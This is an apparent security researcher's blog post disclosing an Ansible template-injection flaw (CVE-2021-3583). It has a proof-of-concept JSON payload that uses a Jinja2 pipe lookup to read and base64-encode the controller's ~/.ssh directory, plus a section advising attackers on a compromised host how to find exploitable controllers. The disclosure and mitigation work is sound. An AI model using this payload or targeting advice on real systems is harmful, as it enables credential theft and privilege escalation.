Intro
Ansible is a host and infrastructure management tool used by many of the DevOps engineers that I have interacted with in my career. I have really fallen in love with using it myself and I am working on automating a number of things in my personal and professional life with Ansible. While doing so, I stumbled across a vulnerability in Ansible, which has helped me realize how high-value of a target for attack Ansible controllers ought to be considered by the organizations using it to manage their production infrastructure.
Discovery
The Controller Crash
I was working in the lab, late one night
When my eyes beheld an eerie sight
From the console tab, errors began to rise
And suddenly to my surprise
it was a controller crash
(The controller crash) It was a template execing crash
(Debug the crash) when using a vertical slash
(I fixed the crash) one-liners still look like trash
Ansible Primer
Ansible is one of those tools that’s basically a full-fledged programming language pretending to be a YAML config. Since Ansible is capable of running the same tasks against a variety of different hosts, facts are what Ansible calls host-specific variables. Ansible Galaxy is also mentioned in this post and is essentially a package manager for sharing Ansible playbooks. YAML configs have a several more niche features that one might not expect, but one of the more common ones is its multi-line string feature, which lets you split up a long string across several lines.
How the issue presented itself
I was trying to make an Ansible playbook to merge different Packer templates into one and some of the Jinja2 filters in Ansible were getting pretty complex.
To make things a bit more clear in the code, I decided to use YAML’s multi-line string feature in some of my set_fact
tasks.
When I did so, however, I started to get an error like the following:
After some debugging, I switched to only use single-line yaml strings, and the issue fixed itself, so I moved on to the next part of my project. There was still this nagging feeling about the error as I moved on in the project though. The error never came up for any of my other playbooks with multi-line Jinja2 filters, so why would it be happening here? Why would the error mention Go-style templates instead of Ansible’s Jinja2-style templates? When I started to realize what that error was actually saying, I began to look at the issue from the perspective of a security researcher instead of as an end-user.
The error was coming up because the Packer templates that were being set in facts utilize Go templates, which were being evaluated by the Ansible controller.
Facts were executed as templates only when the payload is in the output of a multi-line YAML template in a set_facts
task it seemed.
Speculation For Cause
I haven’t really dug into Ansible’s code to figure out why this happens yet.
These unwanted template evaluations seem to only happen when the payload is in the final output of a template evaluated as part of a set_fact
task.
This means that the template evaluation is not occuring at each intermediate step when evaluating the template as I had iniitally wondered.
This leads me to believe that template evaluation logic is applied both when parsing a multi-line string and again in the set_fact
evaluation logic, which takes the output of the multi-line template evaluation as input.
It’s interesting to me that this issue doesn’t seem to present itself in copy
tasks where the content parameter includes a multi-line yaml template.
Vulnerable Example
The playbook below demonstrates the difference between how a single-line and multi-line template is handled.
The script reads and parses the file in /tmp/payload.json
, adds a field to the object, and writes the contents to /tmp/output_*.json
files.
The /tmp/output_safe.json
file represents the behavior when using single-line fact-setting templates and the unsafe
counterpart uses a multi-line template.
The payload in the example will allow a targeted host to read the ~/.ssh
directory of the controller running the playbook, but it could be used for plain-old RCE as well.
poc_playbook.yaml
|
|
payload.json
{
"ssh_keys":"{{ lookup(\"pipe\", \"tar -czf - $HOME/.ssh/ 2>/dev/null | base64 -w0 \") }}"
}
Demo
$ ansible-playbook poc.yml
PLAY [Template injection example] **********************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [Prepare the host by setting it up with the payload] **********************
ok: [localhost]
TASK [Read the payload from the remote server] *********************************
ok: [localhost]
TASK [Add an element to the payload file safely] *******************************
ok: [localhost]
TASK [Write the safe config] ***************************************************
changed: [localhost]
TASK [Combine and write the config safely] *************************************
changed: [localhost]
TASK [Add an element to the payload file unsafely] *****************************
ok: [localhost]
TASK [Write the unsafe config] *************************************************
changed: [localhost]
TASK [Install the package "jq"] ************************************************
ok: [localhost]
TASK [Read the result of the payload] ******************************************
changed: [localhost]
TASK [Output the payload results] **********************************************
ok: [localhost] => {
"msg": "<REDACTED CONTENTS OF MY ~/.ssh DIRECTORY>"
}
PLAY RECAP *********************************************************************
localhost : ok=10 changed=3 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
Impact
In a worst-case scenario such as the one demonstrated in the above example, an attacker could leverage an unprivileged position on a compromised host to escalate their privileges to that of the controller. Ansible controllers often contain broad privileges in an environment and will at the minimum yield control over the other hosts that are managed by the controller. Ansible controllers are often just running on engineer workstations without any protections. I am not personally familiar with all of the mitigations that Red Hat’s enterprise offering, Ansible Tower may provide against such an attack. The fact that Ansible Tower it is a multitenant exeuction environment likely means that they have provided the option to restrict the impact of a compromised Ansible playbook by configuring playbook executions and their privileges to be isolated from eachother.
Exploitation
For Organizations wondering if they are vulnerable
I was only mildly concerned by this for my use-case because the Packer templates I was using were also files on the controller that I own.
Many Ansible users will likely not be in the same situation as their facts are coming from less trustworthy sources, like the hosts that are being managed.
Others will also not have the benefit of routinely using Ansible template characters in their fact contents, which would trigger an error to alert them in the same way as it did for me.
The set_facts
module is very commonly used in Ansible and multi-line YAML strings are a relatively common practice for representing complex operations like the ones that might be in a set_facts
task.
For Attackers who have compromised a host
Even with the high likelihood of this issue being exploitable in some form in many environments, this will be relatively difficult to pull off in the wild. I think that the attacker in the right situation could find it the perfect fit though. Attackers need to consider the following things when assessing if a compromised host will be able to utilize this vulnerability to escalate privileges in their target environment:
- Is the host being managed by Ansible?
- Ansible’s architecture does not require any sort of agent to be installed on the target hosts, it all operates over a standard SSH connection. One detection method could be to watch the tmp directory for files that look like the ones that ansible copies when it is running a command against a host.
- Is the host actually getting managed by a remote host or is Ansible installed locally?
- Is the controller running a vulnerable version of Ansible?
- I want to do more research into what attackers can do to fingerprint the controller connecting to them, but right now it’s unpatched and all fair game.
- Is the controller likely to be processing any of the facts provided by my host in the manner described in this post?
- This is probably the most difficult part in this. Since most of Ansible’s logic takes place on the controler, It will be very difficult to tell what the controller is really doing with the facts you provide it.
- It could be helpful to find out what Ansible Galaxy playbooks already do the things that are happening to your host and review if there are any multi-line
set_fact
tasks in them. - Try to infer if any of the facts controlled by your host are likely to be processed by complex playbooks that might make use of intermediary facts generated from multi-line templates.
If so, it sounds like it might actually work! The example payload I provided shows all you need to get a basic RCE if the fact is pretty straightforward.
Other scenarios
Technically this is possbile for anyone who is able to influence a value that ends up in the value for a fact generated from a multi-line template. It might be useful to review popular Ansible galaxy playbooks to see if any of them are trusting a property that you can control in your particular environment. For example, if you are aware that a PaaS is heavily-utilizing Ansible in managing their users’ infastructure, then providing Jinja2 filter payloads in available inputs could be a lucrative venture.
Disclosure
Timeline
- (2021-05-29) Discovered the issue
- (2021-05-30) Reported the issue to
security@ansible.com
per Ansible docs - (2021-06-02) Provided an example reproducing the issue
- (2021-06-07) Red Hat confirms the flaw and assigns CVE-2021-3583
I haven’t heard anything about a patch yet, but Red Hat said “Since the issue is already public, I believe its ok for you to publish it in your blog now.” when I asked so shrug.
Similar Issues in Ansible
When I looked into it, Ansible has a bit of a history of template injection issues. Though this is expected as template evaluation is a core feature and template injection is a tough issue to solve. Here are some Ansible CVEs with the same CVSS score as mine and which feel related from briefly looking at titles:
TODO: will link to similar CVEs
Future work
I haven’t really researched if this problem shows up for other Ansible modules, so that could yield more findings. I am also interested in looking into tactics that an attacker in a black-box scenario would be able to use to identify that they are running on a host that is being managed insecurely so that they could use this technique effectively. Ansible Tower’s attack surface is also very interesting to me to see what of the long-term mitigations detailed below are implemented, as well as to understand what other mitigations they were able to think of.
Mitigations
Small-picture
Patch Ansible controllers when released
Ansible isn’t patched against this at time of writing, but update when that comes out.
Make Playbooks safe
Don’t use multi-line YAML strings in your Ansible playbooks for the time-being I guess?
With the caveat that it’s only exploitaable when the multi-line template is in a set_fact
task and the output includes attacker-controlled values.
YAML multi-line strings come in several forms so check out https://yaml-multiline.info/ for more info.
Big-picture
TODO: I'll be providing more details in these recommendations as I get the energy, bear with me
Template injections like the one I stumbled across are unfortunately common in Ansible and should be considered as an eventuality to organizations hoping to be proactive about for 0day attacks or who want to compensate for poor patching practices. Consider the value Ansible presents as a target for privilege escalation in your environment. The industry really needs to start thinking about the tools we use to manage production environments as being part of of our production environment’s security ecosystem. The following are some mitigations we can put in place for when a controller is eventually compromised by either an insider threat or vulnerability:
Secure Development Procedures for Ansible Playbooks
Organizations who aren’t already should expand the scope of their security reviews to include their deployment logic and infrastructure. For one, more transparancy that the security team can get into the things they are protecting means they will have more perspective when reviewing the system, and the higher quality recommendations they might be able to provide. Specifically for this issue, there would be no real way for a security team to identify this issue barring an accident unless playbooks themselves are in scope for review. Even in the absense of vulnerabilities, executing unreviewed Ansible playbooks against production environments could be very dangerous from the perspective of insider risk depending on the organization’s tolerance for things like that.